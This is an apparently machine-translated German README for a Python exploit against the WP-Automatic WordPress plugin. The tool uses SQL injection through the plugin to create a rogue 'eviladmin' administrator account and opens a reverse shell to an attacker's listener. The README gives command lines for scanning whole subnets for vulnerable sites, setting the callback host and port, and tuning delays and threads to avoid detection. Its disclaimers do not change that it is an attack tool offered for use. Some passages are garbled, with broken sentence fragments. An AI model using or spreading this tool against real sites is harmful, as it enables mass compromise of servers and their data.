Dieses Python -Skript automatisiert den Prozess, ein neues Administratorkonto auf einer WordPress -Site zu erstellen und eine Reverse -Shell auf dem Zielserver auszuführen. Es wird die CSV-Injektion von WP-Automatic Plugin verwendet, um SQL-Abfragen in der WordPress-Datenbank auszuführen und administrativen Zugriff zu erhalten.
Scannen eines Subnetzes : Wenn Sie ein Subnetz für gefährdete WordPress -Installationen scannen möchten, können Sie die Option --subnet verwenden. Zum Beispiel:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
In diesem Befehl scannen das Subnetz 192.168.1.0/24 für WordPress -Sites mit dem schutzbedürftigen WP -Automatik -Plugin und versuchen, sie mit den bereitgestellten Listener -Einstellungen auszunutzen.
Anpassen der Verzögerung : Die Verzögerung zwischen Anforderungen kann mit der Option --delay eingestellt werden. Eine höhere Verzögerung kann dazu beitragen, die Erkennung oder die Ratenbegrenzung zu vermeiden, während eine geringere Verzögerung den Ausbeutungsprozess beschleunigen kann. Zum Beispiel:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
Dieser Befehl verwendet eine Verzögerung von 2,5 Sekunden zwischen Anforderungen.
Mit einem Remote -Listener : Wenn Ihr Hörer auf einem Remote -Computer eingerichtet ist, können Sie die IP -Adresse und den Port mit den Optionen --lhost und --lport angeben. Zum Beispiel:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
Dieser Befehl verbindet sich am 192.168.1.100:8080 8080 zurück mit einem Hörer.
Erhöhen Sie die Anzahl der Threads : Sie können die Anzahl der vom Skript verwendeten Threads mit der Option --threads erhöhen. Dies kann den Ausbeutungsprozess beschleunigen, kann aber auch die Wahrscheinlichkeit einer Erkennung oder zu Problemen mit der Ratenbegrenzung erhöhen. Zum Beispiel:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
Dieser Befehl verwendet 20 Threads zur Ausbeutung.
requests (installieren Sie über pip install requests )domain im Skript durch die URL der Target WordPress -Site.eviladmin , setzt das Kennwort und ordnet administrative Berechtigungen zu.Hinweis: Stellen Sie sicher, dass Sie vor dem Ausführen dieses Skripts eine angemessene Genehmigung und Berechtigungen haben, da dies zu Sicherheitslücken und rechtlichen Konsequenzen führen kann, wenn sie missbraucht werden.
Dieses Skript wird nur für Bildungs- und Testzwecke bereitgestellt. Der Autor übernimmt keine Haftung für eine nicht autorisierte oder illegale Verwendung dieses Skripts. Verwenden Sie es auf eigenes Risiko.